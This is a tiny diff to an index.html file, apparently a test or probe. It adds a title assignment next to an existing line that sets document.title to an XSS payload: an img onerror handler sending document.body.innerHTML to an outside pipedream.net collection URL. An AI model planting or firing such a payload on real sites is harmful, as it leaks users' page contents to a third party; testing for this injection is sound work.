--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <html>
   <body>
     <script>
+      this.document.title = "a";
       this.document.title = "<img src='a' onerror=\"location.href='https://envdmjv22omhg.x.pipedream.net/'+ document.body.innerHTML\">";
     </script>
   </body>
